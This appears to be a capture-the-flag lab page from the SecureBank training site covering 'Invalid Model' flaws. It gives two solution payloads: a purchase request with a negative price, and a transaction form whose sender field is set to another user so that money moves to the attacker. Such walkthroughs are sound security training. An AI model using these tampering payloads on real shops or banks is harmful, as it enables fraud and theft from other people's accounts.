SecureBank
  • About SecureBank
  • A01:2021 – Broken Access Control
    • About
    • Challenges
  • A02:2021 – Cryptographic Failures
    • About
    • Challenges
  • A03:2021 – Injection
    • About
    • Challenges
  • A04:2021 – Insecure Design
    • About
    • Challenges
  • A05:2021 – Security Misconfiguration
    • About
    • Challenges
  • A06:2021 – Vulnerable and Outdated Components
    • About
    • Challenges
  • A07:2021 – Identification and Authentication Failures
    • About
    • Challenges
  • A08:2021 – Software and Data Integrity Failures
    • About
    • Challenges
  • A09:2021 – Security Logging and Monitoring Failures
    • About
  • A10:2021 – Server-Side Request Forgery (SSRF)
    • About
    • Challenges
  • CROSS SITE SCRIPTING (XXS)
    • About
    • Challenges
  • XML External Entities (XXE)
    • About
    • Challenges
  • Miscellaneous
    • Invalid Model
    • Invalid Redirect
    • Directory Browsing
    • Simultaneous Request
    • reDOS
Powered by GitBook
On this page
  • Challenge
  • #1: Buy product for another price
  • Solution
  • #2: Create a transaction for another user
  • Solution

Was this helpful?

  1. Miscellaneous

Invalid Model

Challenge

#1: Buy product for another price

Buy a product from the store for another price that is listed.

Solution

Create a custom post request on /api/Store/BuyProduct with the following body.

{
	"id": 1,
	"quantity": 1,
	"price": -10
}

You will find the flag in the response header.

#2: Create a transaction for another user

Create a transaction for another user.

Solution

Create a post request to Transaction/Create with the following body. Don't forget about the RequestVerification token and cookie in your request.

SenderId:{OtherUsername}
ReceiverId:{YourUsername}
TransactionDateTime:2020-03-25
Reason:test
Reference:test
Amount:20
__RequestVerificationToken:

You can find the flag in the response cookie.

PreviousChallengesNextInvalid Redirect

Last updated 5 years ago

Was this helpful?